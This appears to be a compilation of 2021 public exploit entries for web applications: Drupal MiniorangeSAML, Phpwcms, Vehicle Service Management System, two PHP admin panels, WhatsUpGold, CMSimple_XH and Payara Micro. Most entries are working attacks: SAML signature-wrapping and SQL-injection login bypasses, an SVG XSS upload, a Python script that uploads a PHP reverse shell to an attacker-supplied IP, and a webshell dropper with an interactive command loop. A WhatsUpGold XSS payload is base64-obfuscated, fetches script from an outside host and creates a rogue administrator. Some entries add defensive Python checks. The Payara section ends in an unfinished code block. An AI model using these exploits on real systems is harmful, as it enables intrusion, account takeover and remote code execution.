Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation
# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036

---

The MiniorangeSAML Drupal plugin v. 8.x-2.22 is vulnerable to XML Signature Wrapping attacks that allow an attacker to perform privilege escalation. In order to exploit the vulnerability, the plugin must be configured with the "Either SAML response or SAML assertion must be signed" option enabled and an empty "x509 certificate".

Administrator point of view:

- Install a Drupal version (for the PoC the version 9.1.10 has been used)
- Configure an external SSO system like Auth0
- Configure the plugin with the Auth0 provider by checking "Either SAML response or SAML assertion must be signed" and leaving "x509 certificate" empty

Attacker point of view:

- Register a normal user on the website
- Perform a login
- Intercept the request with Burp Suite and decode the SAMLResponse parameter
- Inject an additional <saml:Assertion> object before the original one (example here: https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) (SAMLRaider Burp extension, XSW3 payload):

<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
  <saml:Subject>
    <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
    <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
      <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
    </saml:SubjectConfirmation>
  </saml:Subject>
  <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
    <saml:AudienceRestriction>
      <saml:Audience>http://localhost:8080</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>
  <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
    <saml:AuthnContext>
      <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
    </saml:AuthnContext>
  </saml:AuthnStatement>
  <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
      <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>
</saml:Assertion>

- Replace the username with one with higher privileges (like admin)
- Submit the request
- Successful exploitation
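The step that XML Signature Wrapping abuses is the binding between "the assertion whose signature was checked" and "the assertion whose Subject is consumed". The following is an added example, not code from the MiniorangeSAML module or from the advisory: it parses a constructed SAMLResponse laid out like the XSW3 payload above (an unsigned attacker assertion in front of the signed IdP one) and contrasts a consumer that takes the first Assertion with one that only accepts the assertion referenced by its own enveloped ds:Reference URI. Signature cryptography is out of scope here and assumed to be done elsewhere (with the advisory's precondition of an empty x509 certificate there is nothing to verify it against in the first place); all names, IDs and the sample XML are made up for the example.

```python
"""Added example: bind the consumed SAML assertion to the signed one.

Not code from the MiniorangeSAML module. The sample response below is
constructed: the first Assertion is the injected one and has no signature,
the second is the IdP's and is referenced by its own signature.
"""
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}

SAML_RESPONSE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_resp" Version="2.0">
  <saml:Assertion ID="_evil_assertion_ID" Version="2.0">
    <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
    <saml:Subject><saml:NameID>admin</saml:NameID></saml:Subject>
  </saml:Assertion>
  <saml:Assertion ID="_real_assertion_ID" Version="2.0">
    <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:Reference URI="#_real_assertion_ID">
          <ds:DigestValue>c29tZS1kaWdlc3Q=</ds:DigestValue>
        </ds:Reference>
      </ds:SignedInfo>
      <ds:SignatureValue>c29tZS1zaWduYXR1cmU=</ds:SignatureValue>
    </ds:Signature>
    <saml:Subject><saml:NameID>test</saml:NameID></saml:Subject>
  </saml:Assertion>
</samlp:Response>"""


def naive_subject(xml_text):
    """Vulnerable pattern: trust whichever Assertion appears first."""
    root = ET.fromstring(xml_text)
    assertion = root.find("saml:Assertion", NS)
    return assertion.findtext("saml:Subject/saml:NameID", namespaces=NS)


def signed_subject(xml_text):
    """Hardened pattern: consume only the assertion whose own enveloped
    signature references it by ID, and require that ID to be unique."""
    root = ET.fromstring(xml_text)
    assertions = root.findall("saml:Assertion", NS)
    ids = [a.get("ID") for a in assertions]
    if len(ids) != len(set(ids)):
        raise ValueError("duplicate Assertion IDs")
    signed = []
    for a in assertions:
        ref = a.find("ds:Signature/ds:SignedInfo/ds:Reference", NS)
        if ref is None:
            continue
        # The signature must cover the element it is enveloped in.
        if ref.get("URI") != "#" + (a.get("ID") or ""):
            raise ValueError("Reference URI %r does not point at the enclosing Assertion" % ref.get("URI"))
        signed.append(a)
    if len(signed) != 1:
        raise ValueError("expected exactly one signed Assertion, found %d" % len(signed))
    return signed[0].findtext("saml:Subject/saml:NameID", namespaces=NS)


def unsigned_assertion_ids(xml_text):
    """IDs of assertions carrying no signature. With "assertion must be signed"
    configured and no Response-level signature, any entry here should cause the
    whole response to be rejected rather than silently skipped."""
    root = ET.fromstring(xml_text)
    return [a.get("ID") for a in root.findall("saml:Assertion", NS)
            if a.find("ds:Signature", NS) is None]


if __name__ == "__main__":
    print("first-assertion consumer sees:", naive_subject(SAML_RESPONSE))
    print("reference-bound consumer sees:", signed_subject(SAML_RESPONSE))
    print("unsigned assertions present:", unsigned_assertion_ids(SAML_RESPONSE))
```

Run it as-is: the first consumer logs in "admin", the second "test", and the unsigned-assertion check names `_evil_assertion_ID`. Moving the Reference URI to the injected assertion's ID (the classic wrapping trick) makes `signed_subject` raise instead of picking either one.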
-
Phpwcms 1.9.30 - Arbitrary File Upload
# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04

Steps:

1-) You need to log in to the system:
    http://target.com/phpwcms/login.php

2-) Create the payload with an SVG extension (payload.svg):

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">
    alert("XSS!");
  </script>
</svg>

3-) Go to the following link and upload the payload (the csrftoken value is specific to the author's session):
    http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
    From the menu: File -> Multiple file upload -> Select files or drop here

4-) After uploading the payload, open it from the upload directory, e.g.:
    http://192.168.1.112/phpwcms/upload/
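An extension or MIME-type check does not stop this: SVG is XML, and a browser that opens the file directly from /upload/ runs any script in it in the site's origin. The following is an added example, not phpwcms code, of a server-side check to run on an "image" upload before it is stored under a web-served path. The three SVG documents are constructed for the example (the first is the payload from the steps above); the function and constant names are mine.

```python
"""Added example (not phpwcms code): refuse SVG uploads that carry active content."""
import xml.etree.ElementTree as ET

# Constructed samples. PAYLOAD_SVG is the payload from the steps above.
PAYLOAD_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">
    alert("XSS!");
  </script>
</svg>"""

# Same effect without a <script> element: an event handler and a javascript: URL.
HANDLER_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <a xlink:href="javascript:alert(2)"><text y="20">click</text></a>
</svg>"""

CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="red"/>
</svg>"""

# Elements that run script or embed arbitrary HTML inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
# URL schemes that can execute when used in href / xlink:href.
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1]


def svg_findings(data):
    """Return the reasons to reject the document; an empty list means clean."""
    findings = []
    if "<!ENTITY" in data:
        # Internal DTD subset: XXE / entity-expansion vector, never needed for an image.
        findings.append("DTD entity declaration")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + ["not well-formed XML: %s" % exc]
    if _local(root.tag) != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append("active element <%s>" % tag)
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append("event handler attribute %s on <%s>" % (name, tag))
            elif name == "href" and value.strip().lower().startswith(SCRIPT_SCHEMES):
                findings.append("script URL in %s on <%s>" % (name, tag))
    return findings


def is_safe_svg(data):
    """True when the upload may be stored as an image."""
    return not svg_findings(data)


if __name__ == "__main__":
    for label, doc in (("payload", PAYLOAD_SVG), ("handler", HANDLER_SVG), ("clean", CLEAN_SVG)):
        print(label, "->", svg_findings(doc) or "ok")
```

Even with this filter in place, serve the upload directory with `Content-Disposition: attachment` (or a `Content-Security-Policy: sandbox` header) so that a file the filter misses is still not rendered as a page in the application's origin.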
-
Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 30.09.2021
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested on: Ubuntu

import random
import string
import sys
import time

import requests
from bs4 import BeautifulSoup

print("""
[+] Vehicle Service Management System
[!] Auth bypass + shell upload = RCE
""")
time.sleep(2)

if len(sys.argv) != 4:
    print("[~] Usage : python3 exploit.py localhost ip port")
    exit()

site = sys.argv[1]   # target host (and optional port), e.g. localhost
ip = sys.argv[2]     # listener address for the reverse shell
port = sys.argv[3]   # listener port

# PHP reverse shell that becomes the content of the uploaded file
shellcode = "<?php $sock=fsockopen('" + ip + "'," + port + ");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"

letters = string.ascii_lowercase
name = ''.join(random.choice(letters) for i in range(5))

# One boundary for both the Content-Type header and the body; each body line is "--" + boundary.
BOUNDARY = "---------------------------38784447663334447953661330489"


def LoginAndShellUpload():
    print("[+] Try Login")
    time.sleep(1)
    login = 'http://' + site + '/vehicle_service/admin/login.php'
    session = requests.session()
    # The admin login query is built by string concatenation; a quote in the
    # username plus "OR 1=1" and a comment make it match the first account.
    post_data = {"username": "' OR 1=1-- -", "password": "aa"}
    session.post(login, data=post_data)
    cookie = session.cookies.get_dict()
    print('[+]Success login')
    print('[+]Try Shell upload')
    time.sleep(2)

    # Shell upload: the system-settings handler stores the "img" upload under
    # /uploads/ without checking its extension or content type.
    url = 'http://' + site + '/vehicle_service/classes/SystemSettings.php?f=update_settings'
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
        "Origin": "http://localhost",
        "Connection": "close",
        "Referer": "http://localhost/vehicle_service/admin/?page=system_info",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin",
    }
    # Form fields as the settings page submits them: (field, filename, content type, value).
    # The original request carried the application's default "About Us" HTML in about_us;
    # it is trimmed to a placeholder here.
    parts = [
        ("name", None, None, "Vehicle Service Management System"),
        ("short_name", None, None, "VSMS - PHP"),
        ("about_us", None, None, "<p>About Us</p>"),
        ("files", "", "application/octet-stream", ""),
        ("img", name + ".php", "application/x-php", shellcode + "\n\n"),
        ("cover", "", "application/octet-stream", ""),
    ]
    data = ""
    for field, filename, ctype, value in parts:
        data += "--" + BOUNDARY + "\r\n"
        data += 'Content-Disposition: form-data; name="' + field + '"'
        if filename is not None:
            data += '; filename="' + filename + '"\r\nContent-Type: ' + ctype
        data += "\r\n\r\n" + value + "\r\n"
    data += "--" + BOUNDARY + "--\r\n"
    requests.post(url, headers=headers, cookies=cookie, data=data)
    print('[+]Success!')
    print('[+]Getting reverse shell')
    time.sleep(2)


def RCE():
    # /uploads/ has directory listing enabled: find the uploaded .php file and
    # request it to fire the reverse shell. The request stays open while the
    # shell is alive, so a read timeout here is expected.
    path = 'http://' + site + '/vehicle_service/uploads/'
    html_text = requests.get(path).text
    soup = BeautifulSoup(html_text, 'html.parser')
    for link in soup.find_all('a'):
        href = link.get('href')
        if href and ".php" in href:
            try:
                requests.get(path + href, timeout=5)
            except requests.exceptions.ReadTimeout:
                pass
            print('[+]Pwned!')


LoginAndShellUpload()
RCE()
-
Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-09-30
# Exploit Author: sanjay singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:

Step 1 – Go to the product admin panel http://localhost/dfsms/index.php.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change the username to admin' or '1'='1 and the password to dfsms.
Step 5 – Click Forward and you will be logged in as admin.

POC

POST /dfsms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/dfsms/index.php
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1

username=admin%27+or+%271%27%3D%271&password=dfsms&login=
-
Directory Management System 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-01
# Exploit Author: SUDONINJA
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10

Steps-To-Reproduce:

Step 1 – Go to the admin panel http://localhost/dms/admin/.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change both the username and the password to admin' or '1'='1 (as in the request below).
Step 5 – Click Forward and you will be logged in as admin.

POC

POST /dms/admin/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://localhost
Connection: close
Referer: http://localhost/dms/admin/
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1

username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
-
WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
# Date: 09.17.2021
# Exploit Author: Andreas Finstad (4ndr34z)
# Vendor Homepage: https://www.whatsupgold.com
# Version: v.21.0.3, Build 188
# Tested on: Windows 2019 Server
# CVE : CVE-2021-41318
# Reference: https://f20.be/cves/poc-cve-2021-41318

Description:

Improper validation of strings from discovered SNMP devices makes the application prone to stored XSS attacks. Placing an XSS payload in one of the fields reflected in the application triggers the exploitation. There is no CSRF protection/token on adding/posting a new user account, which makes it possible to create a rogue administrator using a staged JavaScript delivered through the XSS.

SNMP

On a *nix computer placed on a subnet accessible from the server for discovery, edit snmpd.conf and add the payload:

# snmpd.conf
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See snmpd.conf(5) man page for details
############################################################################
# SECTION: System Information Setup
#
# syslocation: The [typically physical] location of the system.
#   Note that setting this value here means that when trying to
#   perform an snmp SET operation to the sysLocation.0 variable will make
#   the agent return the "notWritable" error code. IE, including
#   this token in the snmpd.conf file will disable write access to
#   the variable.
#   arguments: location_string

sysName Evil-Device
sysLocation Somewhere Over The Rainbow
sysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>

This is the base64 encoded string:

var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a);

x.js:

// Runs in the victim administrator's browser: the user-creation API has no CSRF token,
// so the session cookie (credentials: 'include') is all that is needed to add an account.
// Origin, Referer, User-Agent and Content-Length are set by the browser itself; fetch()
// ignores attempts to set them, so they are left out here.
var vhost = window.location.protocol + '//' + window.location.host
var username = "sysadmin"
var password = "me"

fetch(vhost + '/NmConsole/api/core/WebUser', {
  method: 'POST',
  headers: {
    'Accept': 'application/json',
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Type': 'application/json'
  },
  credentials: 'include',
  body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups":[1],"WebUserID":-1,"UserName":"' + username + '","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"' + password + '","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}'
});
-
CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 01-10-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.cmsimple-xh.org/
# Software Link: https://www.cmsimple-xh.org/?Downloads
# Version: 1.7.4
# Category: Webapps
# Tested on: Linux/Windows

# CMSimple_XH is an open source project under GPL3 license
# Includes an endpoint that allows remote access
# Backup page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.
# Example: python3 exploit.py -u http://example.com -p Admin123

import argparse
from time import sleep

import requests
from bs4 import BeautifulSoup


def main():
    parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()
    print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    host(args)


def host(args):
    # Normalise the target: add a scheme if it is missing, strip a trailing slash
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
    else:
        print("\n[?] Check Address...\n")
        args.host = "http://" + args.host
    sleep(2)
    if args.host.endswith('/'):
        args.host = args.host[:-1]

    # Check host status
    try:
        response = requests.get(args.host)
        if response.status_code == 200:
            login(args)
        else:
            print("[-] Address not reachable!")
            sleep(2)
    except requests.ConnectionError:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)


def login(args):
    # CMSimple_XH uses a single admin password ("keycut"); a successful login
    # returns the XH_2f session cookie used for the rest of the exploit.
    url = args.host + "/?&login"
    cookies = {"XH_2f": "evil"}
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?&login",
    }
    data = {"login": "true", "keycut": args.password, "submit": "Login"}
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    token = response.cookies.get("XH_2f")
    soup = BeautifulSoup(response.text, 'html.parser')
    link = soup.find("link", {"rel": "next"})
    if link is not None and link['href'] != "/":
        print("[!] Login Success!\n")
        sleep(2)
        csrf(args, token)
    else:
        print("[!] Wrong password!!\n")
        sleep(2)


def csrf(args, token):
    # The content editor page embeds the xh_csrf_token as the fourth hidden input
    url = args.host + "/?file=content"
    cookies = {"status": "adm", "XH_2f": token}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?&settings",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
    }
    response = requests.get(url, headers=headers, cookies=cookies)
    try:
        soup = BeautifulSoup(response.text, 'html.parser')
        csrf_token = soup.find_all("input", type="hidden")[3].get("value")
        create(args, token, csrf_token)
    except Exception as e:
        print(e)


def create(args, token, csrf_token):
    # Save a PHP dropper as the site's content file; when the page is rendered it
    # writes evil.php, a minimal webshell that runs the "cmd" GET parameter.
    payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"
    url = args.host
    cookies = {"status": "adm", "XH_2f": token}
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/?file=content&action=edit&xh_success=content",
        "Accept-Encoding": "gzip, deflate",
    }
    data = {"text": payload, "file": "content", "action": "save", "xh_csrf_token": csrf_token}
    response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)
    if response.status_code == 200:
        print("[!] Create Vuln File!\n")
        sleep(2)
        exploit(args)
    else:
        print("[!] Create Failed!\n")
        sleep(2)


def exploit(args):
    print("[+] Exploit Done!\n")
    sleep(2)
    while True:
        cmd = input("$ ")
        url = args.host + "/evil.php"
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        }
        # cmd travels as a query parameter; requests URL-encodes it
        response = requests.post(url, params={"cmd": cmd}, headers=headers, timeout=5)
        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()
-
Payara Micro Community 5.2021.6 - Directory Traversal
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381 https://nvd.nist.gov/vuln/detail/CVE-2021-41381

Proof of Concept:

Step 1: Open the browser and check the version of the Payara software.
Step 2: Add this path at the end of the URL:
        /.//WEB-INF/classes/META-INF/microprofile-config.properties
Step 3: Check whether the response contains
        "payara.security.openid.default.providerURI="
        "payara.security.openid.sessionScopedConfiguration=true"
Step 4: If either of these strings is in the response, the application is vulnerable to directory traversal.
Step 5: Alternatively, use curl with this command (--path-as-is stops curl from collapsing the /./ segment itself before sending):

Request:
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties

Reference:
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
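The request above works because the container compares the raw request target against its protected directories before the /./ and // segments are collapsed, while the file lookup happens after. The following is an added example, not Payara code or part of the advisory: a canonicalisation routine that does the decoding and collapsing first, plus a scan over access-log lines for requests whose raw target only reaches WEB-INF or META-INF after normalisation. The log lines, client addresses and all function names are constructed for this example.

```python
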